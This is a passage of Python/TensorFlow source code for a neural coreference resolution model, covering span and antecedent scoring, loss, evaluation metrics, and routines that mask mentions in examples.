candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
# don't need this
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, org_content_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]
else:
top_span_speaker_ids = None
# antecedent scores -- change this
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(org_content_mask, 0), util.shape(org_content_mask, 1)
word_segments = tf.reshape(tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len]), [-1])
flat_word_segments = tf.boolean_mask(word_segments, tf.reshape(org_content_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [k, emb]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
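# i.e. the negative marginal log-likelihood per span: -log of the total softmax
# probability assigned to the antecedents labelled true (including the dummy).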
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
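# Sanity check of the bucketing above on a few example distances:
#   distance: 0  1  2  3  4  5  7  8  15  16  31  32  63  64  500
#   bucket:   0  1  2  3  4  5  5  6   6   7   7   8   8   9    9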
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, c, emb]
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
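# The matmul above amounts to a bilinear fast score: with the learned projection W
# (and up to dropout and the projection bias), fast_score(i, j) = (W emb_i) . emb_j,
# computed for all k x k span pairs at once.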
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
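# A small illustrative example (hypothetical spans): with
#   top_span_starts = [0, 3, 7, 10], top_span_ends = [1, 4, 8, 11]
#   predicted_antecedents = [-1, 0, -1, 1]
# span 1 links to span 0 and span 3 links to span 1, so the single predicted
# cluster is ((0, 1), (3, 4), (10, 11)); span 2 has no antecedent and is not
# reported as a cluster.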
def get_mention_top_predicted_antecedents(self, top_span_starts, top_span_ends, predicted_antecedents, list_mentions):
"""
Return a dictionary mapping every mention in list_mentions (e.g. the masked
mentions) to its top predicted antecedent.
"""
mention_to_predicted_antecedent = {}
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i,predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
if mention in list_mentions:
mention_to_predicted_antecedent[mention] = predicted_antecedent
return mention_to_predicted_antecedent
def evaluate_antecedent(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, accuracy_evaluator, selected_mentions=None, evaluator_selected=None):
"""
Update the antecedent evaluator(s); precision, recall and F1 are read from the
evaluator afterwards via get_prf().
"""
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
first_mentions = []
for gc in gold_clusters:
if len(gc) > 1:
first_mention = sorted(gc, key= lambda x: x[0])[0]
first_mentions.append(first_mention)
for mention in gc:
if mention != first_mention:
mention_to_gold[mention] = gc
mention_predicted_top_antecedents = self.get_mention_top_predicted_antecedents(top_span_starts, top_span_ends, predicted_antecedents, mention_to_gold.keys())
accuracy_evaluator.update(mention_predicted_top_antecedents, mention_to_gold)
if evaluator_selected is not None:
mention_to_gold_selected = {m: mention_to_gold[m] for m in selected_mentions}
selected_mentions_predicted_top_antecedents = {m: mention_predicted_top_antecedents[m] for m in selected_mentions if m in mention_predicted_top_antecedents}
evaluator_selected.update(selected_mentions_predicted_top_antecedents, mention_to_gold_selected)
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator, selected_mentions=None, evaluator_selected=None):
'''
Update the coreference evaluator; optionally also evaluate on a selected
subset of mentions.
'''
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
if selected_mentions is not None:
evaluator_selected.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold, selected_mentions = selected_mentions)
return predicted_clusters
def load_eval_data(self, masked=False):
'''
Load the evaluation data, either without masks or with masked mentions
(one masked mention per cluster).
'''
if masked:
eval_data = self.eval_data_masks
else:
eval_data = self.eval_data
if eval_data is None:
def load_line(line):
example = json.loads(line)
#If masked: mask one mention per cluster (but no more than a certain percentage overall)
if masked:
example = add_masks(example, skip_first_mention = True, n_masks_profile = 1, all_profiles = False,
mask_profile = 'one_per_cluster', n_placeholders = self.n_placeholders, perc_mask = 20)[0]
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
eval_data = [load_line(l) for l in f.readlines()]
if masked:
self.eval_data_masks = eval_data
else:
self.eval_data = eval_data
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in eval_data)
if not masked:
print("Loaded {} eval examples.".format(len(eval_data)))
else:
print("Loaded {} eval examples with masks.".format(len(eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False, masked=False, eval_on_masks_only=False, selected_mentions=None):
'''
Evaluate coreference on all mentions (and optionally on the masked subset),
together with antecedent accuracy.
'''
if masked:
self.eval_data_masks = None
self.load_eval_data(masked = masked)
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
antecedent_evaluator = metrics.CorefEvaluator_antecedent() # added to make an antecedent_evaluator, parallel to the original evaluator
if eval_on_masks_only:
antecedent_evaluator_selected = metrics.CorefEvaluator_antecedent()
else:
antecedent_evaluator_selected = None
losses = []
doc_keys = []
num_evaluated = 0
if masked:
eval_data = self.eval_data_masks
else:
eval_data = self.eval_data
for example_num, (tensorized_example, example) in enumerate(eval_data):
_, _, _, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
num_evaluated += 1
print(num_evaluated)
print([i.shape for i in tensorized_example[:4]])
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
if eval_on_masks_only and masked:
selected_mentions = example['masked_mentions']
else:
selected_mentions = None
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator) #, selected_mentions = selected_mentions, evaluator_selected = coref_evaluator_selected)
gold_clusters = [tuple(tuple(m) for m in gc) for gc in example['clusters']]
# added to update the antecedent_evaluation
self.evaluate_antecedent(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], antecedent_evaluator, selected_mentions=selected_mentions, evaluator_selected=antecedent_evaluator_selected)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(eval_data)))
summary_dict = {}
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
antecedent_p, antecedent_r, antecedent_f = antecedent_evaluator.get_prf()
summary_dict["Average antecedent_F1 (py)"] = antecedent_f
print("Average antecedent_F1 (py): {:.2f}% on {} docs".format(antecedent_f * 100, len(doc_keys)))
summary_dict["Average antecedent_precision (py)"] = antecedent_p
print("Average antecedent_precision (py): {:.2f}%".format(antecedent_p * 100))
summary_dict["Average antecedent_recall (py)"] = antecedent_r
print("Average antecedent_recall (py): {:.2f}%".format(antecedent_r * 100))
if eval_on_masks_only:
'''
p_masks, r_masks, f_masks = coref_evaluator_selected.get_prf()
summary_dict["Average masks F1 (py)"] = f_masks
print("Average masks F1 (py): {:.2f}% on {} docs".format(f_masks * 100, len(doc_keys)))
summary_dict["Average masks precision (py)"] = p_masks
print("Average masks precision (py): {:.2f}%".format(p_masks * 100))
summary_dict["Average masks recall (py)"] = r_masks
print("Average masks recall (py): {:.2f}%".format(r_masks * 100))
'''
antecedent_p_masks, antecedent_r_masks, antecedent_f_masks = antecedent_evaluator_selected.get_prf()
summary_dict["Average masks antecedent_F1 (py)"] = antecedent_f_masks
print("Average masks antecedent_F1 (py): {:.2f}% on {} docs".format(antecedent_f_masks * 100, len(doc_keys)))
summary_dict["Average masks antecedent_precision (py)"] = antecedent_p_masks
print("Average masks antecedent_precision (py): {:.2f}%".format(antecedent_p_masks * 100))
summary_dict["Average masks antecedent_recall (py)"] = antecedent_r_masks
print("Average masks antecedent_recall (py): {:.2f}%".format(antecedent_r_masks * 100))
return util.make_summary(summary_dict), f, antecedent_f, antecedent_f_masks
else:
return util.make_summary(summary_dict), f, antecedent_f
def mentions_to_consider(mentions):
'''
We don't mask mentions that are included in other mentions
'''
keep = []
i = 0
j = i + 1
while i < len(mentions) and j < len(mentions):
if mentions[i][1] < mentions[j][0]:
keep.append(mentions[i])
i = j
j += 1
if j == len(mentions):
keep.append(mentions[j - 1])
break
else:
if mentions[i][1] < mentions[j][1]:
i = j
j += 1
else:
j += 1
return keep
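# For example (hypothetical spans, sorted by start token):
#   mentions_to_consider([[0, 2], [1, 1], [4, 5], [7, 9]]) -> [[0, 2], [4, 5], [7, 9]]
# the nested mention [1, 1] is dropped and never considered for masking.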
def build_masks_profiles(candidate_mentions_to_mask, clusters,
all_profiles = False, mask_profile = 'percentage', perc_mask = 20, skip_first = False,
n_profiles = 5, n_masks_profile = 1, mentions_distance = 5, tokens_distance =50):
masked_mentions_profile = []
clusters_tmp = clusters.copy()
if skip_first:
clusters_tmp = [c for c in clusters_tmp if len(c) > 1]
for i in range(len(clusters_tmp)):
clusters_tmp[i] = sorted(clusters_tmp[i], key=lambda x: x[0])
j = 0
if skip_first:
while j < len(clusters_tmp[i]):
if clusters_tmp[i][j] in candidate_mentions_to_mask:
clusters_tmp[i] = clusters_tmp[i][j + 1:]
else:
j += 1
clusters_tmp[i] = [m for m in clusters_tmp[i] if m in candidate_mentions_to_mask]
if len(candidate_mentions_to_mask) > 0:
if mask_profile == 'percentage':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
if n_to_mask > len(candidate_mentions_to_mask):
n_to_mask = len(candidate_mentions_to_mask)
random.shuffle(candidate_mentions_to_mask)
if n_to_mask > 0:
while candidate_mentions_to_mask != []:
# mask a % of mentions in the textspan
masked_mentions = []
for _ in range(n_to_mask):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'one_per_cluster':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
random.shuffle(clusters_tmp)
for i in range(len(clusters_tmp)):
random.shuffle(clusters_tmp[i])
while candidate_mentions_to_mask != []:
masked_mentions = []
for i in range(len(clusters_tmp)):
if len(clusters_tmp[i]) > 0:
to_mask = clusters_tmp[i].pop()
masked_mentions.append(to_mask)
candidate_mentions_to_mask.remove(to_mask)
if len(masked_mentions) == n_to_mask:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'n_profiles_random':
if len(candidate_mentions_to_mask) >= n_profiles:
random.shuffle(candidate_mentions_to_mask)
n = len(candidate_mentions_to_mask)//n_profiles
for i in range(n_profiles):
masked_mentions = []
if i == n_profiles -1 :
n += len(candidate_mentions_to_mask) % n_profiles
for _ in range(n):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
elif mask_profile == 'n_profiles_ordered':
if len(candidate_mentions_to_mask) >= n_profiles:
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
for i in range(n_profiles):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
masked_mentions.append(candidate_mentions_to_mask[j])
j += n_profiles
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
elif mask_profile == 'len_profiles_random':
if n_masks_profile <= len(candidate_mentions_to_mask):
while candidate_mentions_to_mask != []:
# mask a % of mentions in the textspan
masked_mentions = []
for _ in range(n_masks_profile):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'len_profiles_ordered':
if n_masks_profile <= len(candidate_mentions_to_mask):
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
n = len(candidate_mentions_to_mask)//n_masks_profile + 1
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += n
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'mentions_distance':
if n_masks_profile <= len(candidate_mentions_to_mask):
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += mentions_distance
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile = masked_mentions_profile[:n_masks_profile]
elif mask_profile == 'tokens_distance':
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
if not masked_mentions == []:
if candidate_mentions_to_mask[j][0] >= masked_mentions[-1][1] + tokens_distance:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
else:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += 1
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile= masked_mentions_profile[:n_masks_profile]
elif mask_profile == 'one_per_cluster_tokens_distance':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
mention_to_cluster = {}
for c in clusters_tmp:
for m in c:
mention_to_cluster[tuple(m)] = c
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
if not masked_mentions == []:
if candidate_mentions_to_mask[j][0] >= masked_mentions[-1][1] + tokens_distance:
same_cluster = False
for mask in masked_mentions:
if candidate_mentions_to_mask[j] in mention_to_cluster[tuple(mask)]:
same_cluster = True
break
if not same_cluster:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
else:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
if len(masked_mentions) == n_to_mask:
break
j += 1
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile = masked_mentions_profile[:n_masks_profile]
if masked_mentions_profile == []:
masked_mentions_profile = [[]]
return masked_mentions_profile
def add_masks(t, perc_mask=20, mask_profile = 'percentage', max_to_mask = None, n_placeholders = 1,
all_profiles = False, skip_first_mention = True, tokens_distance = 30, n_masks_profile = 1):
# get boundaries of textspans and full text
text_span_all = []
boundaries_sentences = []
for i in range(len(t['sentences'])):
text_span = t['sentences'][i]
boundaries_sentences.append([len(text_span_all), len(text_span_all) + len(text_span)])
text_span_all += text_span
# collect all mentions
mentions = []
actual_mentions = {} # only for debugging
for cluster in t['clusters']:
for mention in cluster:
mention_start = mention[0]
mentions.append(mention)
# only for debugging
actual_mentions[str(mention)] = text_span_all[mention_start:mention[-1] + 1]
mentions = sorted(mentions, key=lambda x: x[0])
map_mentions_to_new_indices = {} # collect indices of mentions shifted after adding masks
candidate_mentions_to_mask = mentions_to_consider(
mentions) # keep only mentions that do not include other mentions
masked_mentions_profiles = build_masks_profiles(candidate_mentions_to_mask, t['clusters'],
all_profiles = all_profiles, mask_profile = mask_profile, perc_mask = perc_mask, skip_first = skip_first_mention,
tokens_distance = tokens_distance, n_masks_profile = n_masks_profile)
new_datapoints = []
for masked_mentions in masked_mentions_profiles:
if masked_mentions != []:
mask_mention_starts = [m[0] for m in masked_mentions]
else:
mask_mention_starts = []
actual_masked_mentions = [actual_mentions[str(m)] for m in masked_mentions]
token_index = 0
new_token_index = 0
prev_subtoken_index = 0 # used for subtoken map
count_subtokens = 0
mentions_covered = 0
idx_next_mention = 0
speakers_new_all = [] # eventually list of lists
sentences_new_all = [] # eventually list of lists
sentence_map_new = []
subtoken_map_new = []
pronouns_new = []
text_span_all_new = [] # for debugging
for textspan_idx in range(len(t['sentences'])):
text_span = t['sentences'][textspan_idx]
speakers = t['speakers'][textspan_idx]
text_span_new = []
speakers_new = []
